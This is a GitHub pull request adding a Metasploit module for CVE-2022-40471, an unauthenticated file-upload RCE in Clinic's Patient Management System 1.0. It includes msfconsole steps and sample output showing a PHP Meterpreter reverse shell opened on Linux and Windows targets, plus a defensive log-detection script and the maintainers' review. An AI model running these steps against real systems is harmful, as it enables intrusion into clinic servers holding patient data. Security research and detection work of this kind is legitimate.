
New Exploit Module for CVE-2022-40471: Clinic's Patient Management System 1.0 - Unauthenticated RCE #19733

Merged: 7 commits, Dec 18, 2024

Conversation

aaryan-11-x
Contributor

This pull request introduces an exploit module for Metasploit that targets an unauthenticated Remote Code Execution (RCE) vulnerability in Clinic's Patient Management System (CPMS) version 1.0. The vulnerability is due to improper file validation in the system's file upload feature, allowing an attacker to upload arbitrary PHP files, such as a PHP web shell, which can then be executed remotely. The attack is facilitated by the presence of a directory listing feature in /pms/user_images, where the uploaded PHP file can be accessed via a publicly accessible URL.

CVE-2022-40471
EDB-ID: 51779

Vulnerable Application:

Clinic's Patient Management System 1.0 is vulnerable to this issue, which allows attackers to upload a PHP shell to the server and execute arbitrary PHP code. This is caused by misconfiguration in the file upload functionality, which does not properly validate uploaded files.

The application can be downloaded from here

Verification Steps:

  1. Install the Clinic's Patient Management System 1.0 on the target web server.
    • Follow the setup instructions for either Windows or Linux as provided in the documentation.
  2. Start msfconsole and load the new exploit module:
    msfconsole
    use exploit/multi/http/clinic_pms_fileupload_rce
  3. Set the required options:
    set rport <port>
    set rhost <ip>
    set targeturi /pms
  4. Check if the target is vulnerable:
    check
    If vulnerable, the output will indicate the target is exploitable:
    [+] <IP> The target is vulnerable.
    
  5. Set up the listener for the reverse shell:
    set lport <port>
    set lhost <ip>
  6. Launch the exploit:
    exploit
  7. If successful, a PHP Meterpreter shell will be received.

Example Scenarios:

  • Linux Target:

    msf exploit(multi/http/clinic_pms_fileupload_rce) > check
    [+] 127.0.0.1:80 - The target is vulnerable.
    
    msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
    [*] Started reverse TCP handler on 192.168.1.104:4444 
    [*] Detected OS: linux
    [*] Uploading PHP Meterpreter payload as zuX7FDRe.php...
    [+] Payload uploaded successfully!
    [*] Executing the uploaded shell at /pms/user_images/1734340436zuX7FDRe.php...
    [*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.104:48290) at 2024-12-16 14:43:59 +0530
    meterpreter > sysinfo
    Computer    : kali
    OS          : Linux kali 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
    Meterpreter : php/linux
    meterpreter >
  • Windows Target:

    msf exploit(multi/http/clinic_pms_fileupload_rce) > check
    [+] 192.168.1.103:80 - The target is vulnerable.
    
    msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
    [*] Started reverse TCP handler on 192.168.1.104:4444 
    [*] Detected OS: winnt
    [*] Uploading PHP Meterpreter payload as lgTprVq5.php...
    [+] Payload uploaded successfully!
    [*] Executing the uploaded shell at /pms/user_images/1734341267lgTprVq5.php...
    [*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615) at 2024-12-16 14:57:43 +0530
    meterpreter > sysinfo
    Computer    : DESKTOP-VE9J36K
    OS          : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64
    Meterpreter : php/windows
    meterpreter >

Options:

  • TARGETURI: (Required) The base path to the Clinic Patient Management System (default: /pms).
  • LISTING_DELAY: (Optional) The delay before fetching the directory listing after uploading the shell (default: 2 seconds).

This exploit was tested successfully on both Linux and Windows environments, providing a fully functional RCE attack vector against the vulnerable CPMS version 1.0.
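For defenders reading this PR, an added example that is not part of the module or the PR: a small access-log check that flags the two conditions the description relies on, a directory listing served from /pms/user_images and a PHP script requested from that image directory. The upload path comes from the PR, the filename shape from the sample output above; the log lines themselves are constructed.

```python
import re

# Prefix and filename shape taken from the PR description and its sample output.
UPLOAD_DIR = "/pms/user_images/"
MODULE_NAME_RE = re.compile(r"\d{10}[A-Za-z0-9]{8}\.php$")   # <unix time><8 random chars>.php
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml)$", re.IGNORECASE)  # extensions PHP handlers commonly serve

# Apache/nginx combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (not from the PR): a listing fetch, a hit on an uploaded
# script, a benign image request that must not be flagged, and a failed probe.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Dec/2024:14:43:57 +0530] "GET /pms/user_images/ HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Dec/2024:14:43:59 +0530] "GET /pms/user_images/1734340436zuX7FDRe.php HTTP/1.1" 200 42 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Dec/2024:14:44:10 +0530] "GET /pms/user_images/photo_12.jpg HTTP/1.1" 200 20481 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Dec/2024:14:44:30 +0530] "GET /pms/user_images/x.PHP?v=1 HTTP/1.1" 404 196 "-" "curl/8.5"
"""


def find_suspicious(log_text):
    """Return one finding per request that should never be served from an image directory."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]      # drop the query string before matching
        if not path.startswith(UPLOAD_DIR):
            continue
        rest = path[len(UPLOAD_DIR):]
        status = int(m.group("status"))
        if rest == "" and status == 200:
            reason = "directory listing served"
        elif SCRIPT_EXT_RE.search(rest):
            reason = "script requested from image directory"
            if MODULE_NAME_RE.search(rest):
                reason += " (matches the module's <unix time><8 chars>.php naming)"
        else:
            continue
        findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "path": path, "status": status, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['status']} {f['path']}: {f['reason']}")
```

A 404 on a script path is still reported, since a failed probe against the image directory is worth seeing alongside the successful hit.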

@aaryan-11-x
Contributor Author

Hi, can you tell me what the issue with the check is? The module works perfectly in my Kali Linux environment.

@msutovsky-r7
Contributor

Hi aaryan-11-x, there was an issue with a different PR that got merged, which caused tests to fail. You created your branch from the version where the merged changes cause checks to fail. You can close this PR, check out from upstream again and submit a new PR, or you can keep this one and we will merge the changes later on. Otherwise, your PR is in review right now.

@aaryan-11-x
Contributor Author

Ok. I'll continue with this PR only.

@msutovsky-r7 msutovsky-r7 merged commit 531ed16 into rapid7:master Dec 18, 2024
37 checks passed
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Dec 19, 2024
@msutovsky-r7
Contributor

msutovsky-r7 commented Dec 19, 2024

Release Notes

New exploit module for Clinic's Patient Management System 1.0, also dubbed CVE-2022-40471. The module exploits an unrestricted file upload, which can be further used to get remote code execution (RCE) through a malicious PHP file.
